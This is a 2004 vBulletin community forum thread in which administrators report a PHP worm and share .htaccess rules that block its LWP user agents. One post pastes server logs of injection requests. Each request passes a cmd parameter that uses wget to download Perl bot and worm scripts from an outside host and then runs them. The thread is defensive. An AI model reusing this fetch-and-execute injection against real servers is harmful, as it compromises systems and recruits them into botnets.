showthread attack attempt?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • AWS
    Senior Member
    • Apr 2000
    • 1830
    • 5.2.x

    #16
    To view the coding right click the broken image and save it to disk. Rename it giving it .txt extension and then open it in any text editor.
    Admins Zone - Resources for Forum Administrators

    Comment

    • Streicher
      Senior Member
      • Jan 2001
      • 373
      • 3.7.x

      #17
      It is easy to block them. Put the code of the attachment into .htaccess
      Attached Files
      Streicher

      Comment

      • Floris
        Senior Member
        • Dec 2001
        • 37767

        #18
        I'll try that on my site as I now have more then 650 worms trying to exploit my vB haha

        Comment

        • wock
          New Member
          • May 2004
          • 10

          #19
          same happened to mine last night
          server admin have sent me a full logg dont know if it is of any use
          Please talk to vbulletin about the following security hole in their system intruder got in last night thru your site the following way and uploaded files to the temp dir and driving load on server up.
          The vulnerability is in:
          save-concorde.org.uk/forums/printthread.php?t=1134/showthread.php?

          The hackers ip is 66.90.67.40, 64.191.63.149 etc


          Code:
          ###########################
          save-concorde.org.uk:64.191.63.149 - - [25/Dec/2004:09:03:27 -0500] "GET 
          /forums/printthread.php?t=1134/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 4532 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:66.90.67.40 - - [25/Dec/2004:09:09:07 -0500] "GET 
          /forums/printthread.php?t=1134/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 4532 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:66.90.67.40 - - [25/Dec/2004:09:09:07 -0500] "GET 
          /forums/printthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11380 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:66.90.67.40 - - [25/Dec/2004:09:09:07 -0500] "GET 
          /forums/printthread.php?t=1134/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 4532 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:69.44.56.140 - - [25/Dec/2004:09:10:02 -0500] "GET 
          /forums/printthread.php?t=1229/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 3731 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:69.44.56.140 - - [25/Dec/2004:09:10:03 -0500] "GET 
          /forums/printthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11383 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:69.44.56.140 - - [25/Dec/2004:09:10:03 -0500] "GET 
          /forums/printthread.php?t=1229/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 3731 "-" "LWP::Simple/5.803"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:55 -0500] "GET 
          /forums/printthread.php?t=907/printthread.php?t=907&pp=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:55 -0500] "GET 
          /forums/printthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11383 "-" "LWP::Simple/5.65"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:56 -0500] "GET 
          /forums/printthread.php?t=907/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:56 -0500] "GET 
          /forums/printthread.php?t=907/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:19:59 -0500] "GET 
          /forums/printthread.php?t=907/printthread.php?t=907&pp=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
          save-concorde.org.uk:204.2.109.48 - - [25/Dec/2004:09:20:02 -0500] "GET 
          /forums/printthread.php?t=907/forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt 
          HTTP/1.1" 200 11197 "-" "LWP::Simple/5.65"
          Last edited by Jerry; Sun 26 Dec '04, 9:49am.

          Comment

          • Scott MacVicar
            Former vBulletin Developer
            • Dec 2000
            • 13286

            #20
            Your admin doesn't know what he's talking about, its a worm thats trying to attack ALL php script by attempting to pass a long string into ALL variables it can find, the problem is that on google vBulletin is the most popular php link so we're getting more attacks.

            If something actually wrote something to the tmp directory then it wasn't from vBulletin.

            Scott MacVicar

            My Blog | Twitter

            Comment

            • mOdEtWo
              Senior Member
              • Dec 2003
              • 334
              • 3.7.x

              #21
              Originally posted by Streicher
              It is easy to block them. Put the code of the attachment into .htaccess
              Thank you, that fixed the problem for me. I don't have the worm/bots browsing the forums anymore.

              meow

              Comment

              • eclectica
                Senior Member
                • Sep 2003
                • 334
                • 3.6.x

                #22
                I've had these unusual bots going through just the archives of the forum and turned them off until I learned more. They all had user agents like lwp-trivial/1.41 or LWP::Simple/5.803

                Here's a typical link they are hitting in the archives:

                Comment

                • Alcar
                  Member
                  • Aug 2002
                  • 58
                  • 3.6.x

                  #23
                  So they aren't actually a threat, as vBulletin is secure in this particular manner?

                  I hate having to use HTACCESS for anything much other than disabling directory viewing.

                  Alcar...
                  http://www.oddworldforums.net

                  Comment

                  • ManagerJosh
                    Senior Member
                    • Jun 2002
                    • 9922

                    #24
                    what's happening is these worms are trying every variable they can find and attempting to exploit them Alcar.

                    the .HTACCESS is merely to jam up the bots from bombarding and overwhelming your server. It won't affect your users.
                    ManagerJosh, Owner of 4 XenForo Licenses, 1 vBulletin Legacy License, 1 Internet Brands Suite License
                    Director, WorldSims.org | Gaming Hosting Administrator, SimGames.net, Urban Online Entertainment

                    Comment

                    • ManagerJosh
                      Senior Member
                      • Jun 2002
                      • 9922

                      #25
                      Just an FYI for those who are blocking by IP, I caught these guys running around my site..


                      67.15.52.18
                      LWP::Simple/5.803
                      69.93.114.234
                      LWP::Simple/5.65
                      81.4.64.206
                      LWP::Simple/5.63
                      66.98.172.100
                      LWP::Simple/5.65
                      66.98.152.87
                      LWP::Simple/5.65
                      69.93.114.234
                      LWP::Simple/5.65
                      ManagerJosh, Owner of 4 XenForo Licenses, 1 vBulletin Legacy License, 1 Internet Brands Suite License
                      Director, WorldSims.org | Gaming Hosting Administrator, SimGames.net, Urban Online Entertainment

                      Comment

                      • digitalpoint
                        Senior Member
                        • Mar 2004
                        • 2573
                        • 4.1.x

                        #26
                        Can't really be done by IP address since any exploited box will do it.

                        Yesterday morning when I saw it happening, I also blocked it with a quick .htaccess entry, which worked. In case anyone couldn't get it to work with the one posted for whatever reason, this is what I'm using:

                        Code:
                        RewriteEngine on
                        RewriteCond %{HTTP_USER_AGENT}  ^LWP* [OR]
                        RewriteCond %{HTTP_USER_AGENT}  ^lwp*
                        RewriteRule  .*      - [F]
                        Sphinx Search for vBulletin 4: https://marketplace.digitalpoint.com...tin-4.870/item
                        Someone send me a message on Twitter when this site is usable again. https://twitter.com/digitalpoint

                        Comment

                        • Marc Smith
                          Senior Member
                          • Aug 2001
                          • 510
                          • 3.6.x

                          #27
                          Also see http://www.vbulletin.com/forum/showthread.php?t=124244

                          Several of us have been seeing this.

                          Comment

                          • cirisme
                            Senior Member
                            • Feb 2003
                            • 1310
                            • 3.0.7

                            #28
                            Hmmm, so that's why our long standing(year and a half, or thereabouts) Most users ever online was broken yesterday. Saw a bunch of LWP'ers on WOL so I banned the lot.

                            Thanks for the info, all.
                            TheologyWeb. We debate theology. srsly.

                            Comment

                            • boro_boy
                              Senior Member
                              • Dec 2002
                              • 376
                              • 3.8.x

                              #29
                              Originally posted by Streicher
                              It is easy to block them. Put the code of the attachment into .htaccess
                              i applied this and the bots are slowly but surely reducing in number.
                              My Football Forum

                              Comment

                              • boro_boy
                                Senior Member
                                • Dec 2002
                                • 376
                                • 3.8.x

                                #30
                                yeah they have all gone now. Thank You very much.
                                My Football Forum

                                Comment

                                widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                                Working...